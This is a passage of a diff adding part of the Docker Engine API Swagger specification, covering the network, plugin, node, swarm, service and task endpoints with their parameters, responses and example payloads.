+                    Gateway: "172.20.10.11"
+                  - Subnet: "2001:db8:abcd::/64"
+                    Gateway: "2001:db8:abcd::1011"
+                Options:
+                  foo: "bar"
+              Internal: true
+              Options:
+                com.docker.network.bridge.default_bridge: "true"
+                com.docker.network.bridge.enable_icc: "true"
+                com.docker.network.bridge.enable_ip_masquerade: "true"
+                com.docker.network.bridge.host_binding_ipv4: "0.0.0.0"
+                com.docker.network.bridge.name: "docker0"
+                com.docker.network.driver.mtu: "1500"
+              Labels:
+                com.example.some-label: "some-value"
+                com.example.some-other-label: "some-other-value"
+      tags: ["Network"]
+
+  /networks/{id}/connect:
+    post:
+      summary: "Connect a container to a network"
+      operationId: "NetworkConnect"
+      consumes:
+        - "application/octet-stream"
+      responses:
+        200:
+          description: "No error"
+        403:
+          description: "Operation not supported for swarm scoped networks"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "Network or container not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Network ID or name"
+          required: true
+          type: "string"
+        - name: "container"
+          in: "body"
+          required: true
+          schema:
+            type: "object"
+            properties:
+              Container:
+                type: "string"
+                description: "The ID or name of the container to connect to the network."
+              EndpointConfig:
+                $ref: "#/definitions/EndpointSettings"
+            example:
+              Container: "3613f73ba0e4"
+              EndpointConfig:
+                IPAMConfig:
+                  IPv4Address: "172.24.56.89"
+                  IPv6Address: "2001:db8::5689"
+      tags: ["Network"]
+
+  /networks/{id}/disconnect:
+    post:
+      summary: "Disconnect a container from a network"
+      operationId: "NetworkDisconnect"
+      consumes:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+        403:
+          description: "Operation not supported for swarm scoped networks"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "Network or container not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Network ID or name"
+          required: true
+          type: "string"
+        - name: "container"
+          in: "body"
+          required: true
+          schema:
+            type: "object"
+            properties:
+              Container:
+                type: "string"
+                description: "The ID or name of the container to disconnect from the network."
+              Force:
+                type: "boolean"
+                description: "Force the container to disconnect from the network."
+      tags: ["Network"]
+  /networks/prune:
+    post:
+      summary: "Delete unused networks"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      operationId: "NetworkPrune"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
+
+            Available filters:
+          type: "string"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              NetworksDeleted:
+                description: "Networks that were deleted"
+                type: "array"
+                items:
+                  type: "string"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Network"]
+  /plugins:
+    get:
+      summary: "List plugins"
+      operationId: "PluginList"
+      description: "Returns information about installed plugins."
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Plugin"
+            example:
+              - Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078"
+                Name: "tiborvass/sample-volume-plugin"
+                Tag: "latest"
+                Active: true
+                Settings:
+                  Env:
+                    - "DEBUG=0"
+                  Args: null
+                  Devices: null
+                Config:
+                  Description: "A sample volume plugin for Docker"
+                  Documentation: "https://docs.docker.com/engine/extend/plugins/"
+                  Interface:
+                    Types:
+                      - "docker.volumedriver/1.0"
+                    Socket: "plugins.sock"
+                  Entrypoint:
+                    - "/usr/bin/sample-volume-plugin"
+                    - "/data"
+                  WorkDir: ""
+                  User: {}
+                  Network:
+                    Type: ""
+                  Linux:
+                    Capabilities: null
+                    AllowAllDevices: false
+                    Devices: null
+                  Mounts: null
+                  PropagatedMount: "/data"
+                  Env:
+                    - Name: "DEBUG"
+                      Description: "If set, prints debug messages"
+                      Settable: null
+                      Value: "0"
+                  Args:
+                    Name: "args"
+                    Description: "command line arguments"
+                    Settable: null
+                    Value: []
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Plugin"]
+
+  /plugins/privileges:
+    get:
+      summary: "Get plugin privileges"
+      operationId: "GetPluginPrivileges"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              description: "Describes a permission the user has to accept upon installing the plugin."
+              type: "object"
+              properties:
+                Name:
+                  type: "string"
+                Description:
+                  type: "string"
+                Value:
+                  type: "array"
+                  items:
+                    type: "string"
+            example:
+              - Name: "network"
+                Description: ""
+                Value:
+                  - "host"
+              - Name: "mount"
+                Description: ""
+                Value:
+                  - "/data"
+              - Name: "device"
+                Description: ""
+                Value:
+                  - "/dev/cpu_dma_latency"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "query"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+      tags:
+        - "Plugin"
+
+  /plugins/pull:
+    post:
+      summary: "Install a plugin"
+      operationId: "PluginPull"
+      description: |
+        Pulls and installs a plugin. After the plugin is installed, it can be enabled using the [`POST /plugins/{name}/enable` endpoint](#operation/PostPluginsEnable).
+      produces:
+        - "application/json"
+      responses:
+        204:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "remote"
+          in: "query"
+          description: |
+            Remote reference for plugin to install.
+
+            The `:latest` tag is optional, and is used as the default if omitted.
+          required: true
+          type: "string"
+        - name: "name"
+          in: "query"
+          description: |
+            Local name for the pulled plugin.
+
+            The `:latest` tag is optional, and is used as the default if omitted.
+          required: false
+          type: "string"
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+        - name: "body"
+          in: "body"
+          schema:
+            type: "array"
+            items:
+              description: "Describes a permission accepted by the user upon installing the plugin."
+              type: "object"
+              properties:
+                Name:
+                  type: "string"
+                Description:
+                  type: "string"
+                Value:
+                  type: "array"
+                  items:
+                    type: "string"
+            example:
+              - Name: "network"
+                Description: ""
+                Value:
+                  - "host"
+              - Name: "mount"
+                Description: ""
+                Value:
+                  - "/data"
+              - Name: "device"
+                Description: ""
+                Value:
+                  - "/dev/cpu_dma_latency"
+      tags: ["Plugin"]
+  /plugins/{name}/json:
+    get:
+      summary: "Inspect a plugin"
+      operationId: "PluginInspect"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Plugin"
+        404:
+          description: "plugin is not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+      tags: ["Plugin"]
+  /plugins/{name}:
+    delete:
+      summary: "Remove a plugin"
+      operationId: "PluginDelete"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Plugin"
+        404:
+          description: "plugin is not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+        - name: "force"
+          in: "query"
+          description: "Disable the plugin before removing. This may result in issues if the plugin is in use by a container."
+          type: "boolean"
+          default: false
+      tags: ["Plugin"]
+  /plugins/{name}/enable:
+    post:
+      summary: "Enable a plugin"
+      operationId: "PluginEnable"
+      responses:
+        200:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+        - name: "timeout"
+          in: "query"
+          description: "Set the HTTP client timeout (in seconds)"
+          type: "integer"
+          default: 0
+      tags: ["Plugin"]
+  /plugins/{name}/disable:
+    post:
+      summary: "Disable a plugin"
+      operationId: "PluginDisable"
+      responses:
+        200:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+      tags: ["Plugin"]
+  /plugins/{name}/upgrade:
+    post:
+      summary: "Upgrade a plugin"
+      operationId: "PluginUpgrade"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "plugin not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+        - name: "remote"
+          in: "query"
+          description: |
+            Remote reference to upgrade to.
+
+            The `:latest` tag is optional, and is used as the default if omitted.
+          required: true
+          type: "string"
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+        - name: "body"
+          in: "body"
+          schema:
+            type: "array"
+            items:
+              description: "Describes a permission accepted by the user upon installing the plugin."
+              type: "object"
+              properties:
+                Name:
+                  type: "string"
+                Description:
+                  type: "string"
+                Value:
+                  type: "array"
+                  items:
+                    type: "string"
+            example:
+              - Name: "network"
+                Description: ""
+                Value:
+                  - "host"
+              - Name: "mount"
+                Description: ""
+                Value:
+                  - "/data"
+              - Name: "device"
+                Description: ""
+                Value:
+                  - "/dev/cpu_dma_latency"
+      tags: ["Plugin"]
+  /plugins/create:
+    post:
+      summary: "Create a plugin"
+      operationId: "PluginCreate"
+      consumes:
+        - "application/x-tar"
+      responses:
+        204:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "query"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+        - name: "tarContext"
+          in: "body"
+          description: "Path to tar containing plugin rootfs and manifest"
+          schema:
+            type: "string"
+            format: "binary"
+      tags: ["Plugin"]
+  /plugins/{name}/push:
+    post:
+      summary: "Push a plugin"
+      operationId: "PluginPush"
+      description: |
+        Push a plugin to the registry.
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "plugin not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Plugin"]
+  /plugins/{name}/set:
+    post:
+      summary: "Configure a plugin"
+      operationId: "PluginSet"
+      consumes:
+        - "application/json"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
+          required: true
+          type: "string"
+        - name: "body"
+          in: "body"
+          schema:
+            type: "array"
+            items:
+              type: "string"
+            example: ["DEBUG=1"]
+      responses:
+        204:
+          description: "No error"
+        404:
+          description: "Plugin not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Plugin"]
+  /nodes:
+    get:
+      summary: "List nodes"
+      operationId: "NodeList"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Node"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the nodes list, encoded as JSON (a `map[string][]string`).
+
+            Available filters:
+            - `id=<node id>`
+            - `label=<engine label>`
+            - `membership=`(`accepted`|`pending`)`
+            - `name=<node name>`
+            - `role=`(`manager`|`worker`)`
+          type: "string"
+      tags: ["Node"]
+  /nodes/{id}:
+    get:
+      summary: "Inspect a node"
+      operationId: "NodeInspect"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Node"
+        404:
+          description: "no such node"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "The ID or name of the node"
+          type: "string"
+          required: true
+      tags: ["Node"]
+    delete:
+      summary: "Delete a node"
+      operationId: "NodeDelete"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such node"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "The ID or name of the node"
+          type: "string"
+          required: true
+        - name: "force"
+          in: "query"
+          description: "Force remove a node from the swarm"
+          default: false
+          type: "boolean"
+      tags: ["Node"]
+  /nodes/{id}/update:
+    post:
+      summary: "Update a node"
+      operationId: "NodeUpdate"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such node"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "The ID of the node"
+          type: "string"
+          required: true
+        - name: "body"
+          in: "body"
+          schema:
+            $ref: "#/definitions/NodeSpec"
+        - name: "version"
+          in: "query"
+          description: "The version number of the node object being updated. This is required to avoid conflicting writes."
+          type: "integer"
+          format: "int64"
+          required: true
+      tags: ["Node"]
+  /swarm:
+    get:
+      summary: "Inspect swarm"
+      operationId: "SwarmInspect"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            allOf:
+              - $ref: "#/definitions/ClusterInfo"
+              - type: "object"
+                properties:
+                  JoinTokens:
+                    description: "The tokens workers and managers need to join the swarm."
+                    type: "object"
+                    properties:
+                      Worker:
+                        description: "The token workers can use to join the swarm."
+                        type: "string"
+                      Manager:
+                        description: "The token managers can use to join the swarm."
+                        type: "string"
+            example:
+              CreatedAt: "2016-08-15T16:00:20.349727406Z"
+              Spec:
+                Dispatcher:
+                  HeartbeatPeriod: 5000000000
+                Orchestration:
+                  TaskHistoryRetentionLimit: 10
+                CAConfig:
+                  NodeCertExpiry: 7776000000000000
+                Raft:
+                  LogEntriesForSlowFollowers: 500
+                  HeartbeatTick: 1
+                  SnapshotInterval: 10000
+                  ElectionTick: 3
+                TaskDefaults: {}
+                EncryptionConfig:
+                  AutoLockManagers: false
+                Name: "default"
+              JoinTokens:
+                Worker: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a"
+                Manager: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l"
+              ID: "70ilmkj2f6sp2137c753w2nmt"
+              UpdatedAt: "2016-08-15T16:32:09.623207604Z"
+              Version:
+                Index: 51
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Swarm"]
+  /swarm/init:
+    post:
+      summary: "Initialize a new swarm"
+      operationId: "SwarmInit"
+      produces:
+        - "application/json"
+        - "text/plain"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            description: "The node ID"
+            type: "string"
+            example: "7v2t30z9blmxuhnyo6s4cpenp"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        406:
+          description: "node is already part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            type: "object"
+            properties:
+              ListenAddr:
+                description: "Listen address used for inter-manager communication, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is used."
+                type: "string"
+              AdvertiseAddr:
+                description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible."
+                type: "string"
+              ForceNewCluster:
+                description: "Force creation of a new swarm."
+                type: "boolean"
+              Spec:
+                $ref: "#/definitions/SwarmSpec"
+            example:
+              ListenAddr: "0.0.0.0:2377"
+              AdvertiseAddr: "192.168.1.1:2377"
+              ForceNewCluster: false
+              Spec:
+                Orchestration: {}
+                Raft: {}
+                Dispatcher: {}
+                CAConfig: {}
+                EncryptionConfig:
+                  AutoLockManagers: false
+      tags: ["Swarm"]
+  /swarm/join:
+    post:
+      summary: "Join an existing swarm"
+      operationId: "SwarmJoin"
+      responses:
+        200:
+          description: "no error"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is already part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            type: "object"
+            properties:
+              ListenAddr:
+                description: "Listen address used for inter-manager communication if the node gets promoted to manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP)."
+                type: "string"
+              AdvertiseAddr:
+                description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible."
+                type: "string"
+              RemoteAddrs:
+                description: "Addresses of manager nodes already participating in the swarm."
+                type: "string"
+              JoinToken:
+                description: "Secret token for joining this swarm."
+                type: "string"
+            example:
+              ListenAddr: "0.0.0.0:2377"
+              AdvertiseAddr: "192.168.1.1:2377"
+              RemoteAddrs:
+                - "node1:2377"
+              JoinToken: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
+      tags: ["Swarm"]
+  /swarm/leave:
+    post:
+      summary: "Leave a swarm"
+      operationId: "SwarmLeave"
+      responses:
+        200:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "force"
+          description: "Force leave swarm, even if this is the last manager or that it will break the cluster."
+          in: "query"
+          type: "boolean"
+          default: false
+      tags: ["Swarm"]
+  /swarm/update:
+    post:
+      summary: "Update a swarm"
+      operationId: "SwarmUpdate"
+      responses:
+        200:
+          description: "no error"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            $ref: "#/definitions/SwarmSpec"
+        - name: "version"
+          in: "query"
+          description: "The version number of the swarm object being updated. This is required to avoid conflicting writes."
+          type: "integer"
+          format: "int64"
+          required: true
+        - name: "rotateWorkerToken"
+          in: "query"
+          description: "Rotate the worker join token."
+          type: "boolean"
+          default: false
+        - name: "rotateManagerToken"
+          in: "query"
+          description: "Rotate the manager join token."
+          type: "boolean"
+          default: false
+        - name: "rotateManagerUnlockKey"
+          in: "query"
+          description: "Rotate the manager unlock key."
+          type: "boolean"
+          default: false
+      tags: ["Swarm"]
+  /swarm/unlockkey:
+    get:
+      summary: "Get the unlock key"
+      operationId: "SwarmUnlockkey"
+      consumes:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              UnlockKey:
+                description: "The swarm's unlock key."
+                type: "string"
+            example:
+              UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Swarm"]
+  /swarm/unlock:
+    post:
+      summary: "Unlock a locked manager"
+      operationId: "SwarmUnlock"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      parameters:
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            type: "object"
+            properties:
+              UnlockKey:
+                description: "The swarm's unlock key."
+                type: "string"
+            example:
+              UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8"
+      responses:
+        200:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Swarm"]
+  /services:
+    get:
+      summary: "List services"
+      operationId: "ServiceList"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Service"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the services list. Available filters:
+
+            - `id=<service id>`
+            - `name=<service name>`
+            - `label=<service label>`
+      tags: ["Service"]
+  /services/create:
+    post:
+      summary: "Create a service"
+      operationId: "ServiceCreate"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              ID:
+                description: "The ID of the created service."
+                type: "string"
+              Warning:
+                description: "Optional warning message"
+                type: "string"
+            example:
+              ID: "ak7w3gjqoa3kuz8xcpnyy0pvl"
+              Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found"
+        403:
+          description: "network is not eligible for services"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "name conflicts with an existing service"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "server error or node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            allOf:
+              - $ref: "#/definitions/ServiceSpec"
+              - type: "object"
+                example:
+                  Name: "web"
+                  TaskTemplate:
+                    ContainerSpec:
+                      Image: "nginx:alpine"
+                      Mounts:
+                        -
+                          ReadOnly: true
+                          Source: "web-data"
+                          Target: "/usr/share/nginx/html"
+                          Type: "volume"
+                          VolumeOptions:
+                            DriverConfig: {}
+                            Labels:
+                              com.example.something: "something-value"
+                      User: "33"
+                      DNSConfig:
+                        Nameservers: ["8.8.8.8"]
+                        Search: ["example.org"]
+                        Options: ["timeout:3"]
+                    LogDriver:
+                      Name: "json-file"
+                      Options:
+                        max-file: "3"
+                        max-size: "10M"
+                    Placement: {}
+                    Resources:
+                      Limits:
+                        MemoryBytes: 104857600
+                      Reservations: {}
+                    RestartPolicy:
+                      Condition: "on-failure"
+                      Delay: 10000000000
+                      MaxAttempts: 10
+                  Mode:
+                    Replicated:
+                      Replicas: 4
+                  UpdateConfig:
+                    Delay: 30000000000
+                    Parallelism: 2
+                    FailureAction: "pause"
+                  EndpointSpec:
+                    Ports:
+                      -
+                        Protocol: "tcp"
+                        PublishedPort: 8080
+                        TargetPort: 80
+                  Labels:
+                    foo: "bar"
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+      tags: ["Service"]
+  /services/{id}:
+    get:
+      summary: "Inspect a service"
+      operationId: "ServiceInspect"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Service"
+        404:
+          description: "no such service"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "ID or name of service."
+          required: true
+          type: "string"
+      tags: ["Service"]
+    delete:
+      summary: "Delete a service"
+      operationId: "ServiceDelete"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such service"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "ID or name of service."
+          required: true
+          type: "string"
+      tags: ["Service"]
+  /services/{id}/update:
+    post:
+      summary: "Update a service"
+      operationId: "ServiceUpdate"
+      consumes: ["application/json"]
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/ImageDeleteResponse"
+        404:
+          description: "no such service"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "ID or name of service."
+          required: true
+          type: "string"
+        - name: "body"
+          in: "body"
+          required: true
+          schema:
+            allOf:
+              - $ref: "#/definitions/ServiceSpec"
+              - type: "object"
+                example:
+                  Name: "top"
+                  TaskTemplate:
+                    ContainerSpec:
+                      Image: "busybox"
+                      Args:
+                        - "top"
+                    Resources:
+                      Limits: {}
+                      Reservations: {}
+                    RestartPolicy:
+                      Condition: "any"
+                      MaxAttempts: 0
+                    Placement: {}
+                    ForceUpdate: 0
+                  Mode:
+                    Replicated:
+                      Replicas: 1
+                  UpdateConfig:
+                    Parallelism: 1
+                    Monitor: 15000000000
+                    MaxFailureRatio: 0.15
+                  EndpointSpec:
+                    Mode: "vip"
+
+        - name: "version"
+          in: "query"
+          description: "The version number of the service object being updated. This is required to avoid conflicting writes."
+          required: true
+          type: "integer"
+        - name: "registryAuthFrom"
+          in: "query"
+          type: "string"
+          description: "If the X-Registry-Auth header is not specified, this
+  parameter indicates where to find registry authorization credentials. The
+  valid values are `spec` and `previous-spec`."
+          default: "spec"
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+
+      tags: ["Service"]
+  /services/{id}/logs:
+    get:
+      summary: "Get service logs"
+      description: |
+        Get `stdout` and `stderr` logs from a service.
+
+        **Note**: This endpoint works only for services with the `json-file` or `journald` logging drivers.
+      operationId: "ServiceLogs"
+      produces:
+        - "application/vnd.docker.raw-stream"
+        - "application/json"
+      responses:
+        101:
+          description: "logs returned as a stream"
+          schema:
+            type: "string"
+            format: "binary"
+        200:
+          description: "logs returned as a string in response body"
+          schema:
+            type: "string"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "details"
+          in: "query"
+          description: "Show extra details provided to logs."
+          type: "boolean"
+          default: false
+        - name: "follow"
+          in: "query"
+          description: |
+            Return the logs as a stream.
+
+            This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach).
+          type: "boolean"
+          default: false
+        - name: "stdout"
+          in: "query"
+          description: "Return logs from `stdout`"
+          type: "boolean"
+          default: false
+        - name: "stderr"
+          in: "query"
+          description: "Return logs from `stderr`"
+          type: "boolean"
+          default: false
+        - name: "since"
+          in: "query"
+          description: "Only return logs since this time, as a UNIX timestamp"
+          type: "integer"
+          default: 0
+        - name: "timestamps"
+          in: "query"
+          description: "Add timestamps to every log line"
+          type: "boolean"
+          default: false
+        - name: "tail"
+          in: "query"
+          description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines."
+          type: "string"
+          default: "all"
+      tags: ["Service"]
+  /tasks:
+    get:
+      summary: "List tasks"
+      operationId: "TaskList"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Task"
+            example:
+              - ID: "0kzzo1i0y4jz6027t0k7aezc7"
+                Version:
+                  Index: 71
+                CreatedAt: "2016-06-07T21:07:31.171892745Z"
+                UpdatedAt: "2016-06-07T21:07:31.376370513Z"
+                Spec:
+                  ContainerSpec:
+                    Image: "redis"
+                  Resources:
+                    Limits: {}
+                    Reservations: {}
+                  RestartPolicy:
+                    Condition: "any"
+                    MaxAttempts: 0
+                  Placement: {}
+                ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz"
+                Slot: 1
+                NodeID: "60gvrl6tm78dmak4yl7srz94v"
+                Status:
+                  Timestamp: "2016-06-07T21:07:31.290032978Z"
+                  State: "running"
+                  Message: "started"
+                  ContainerStatus:
+                    ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035"
+                    PID: 677
+                DesiredState: "running"
+                NetworksAttachments:
+                  - Network:
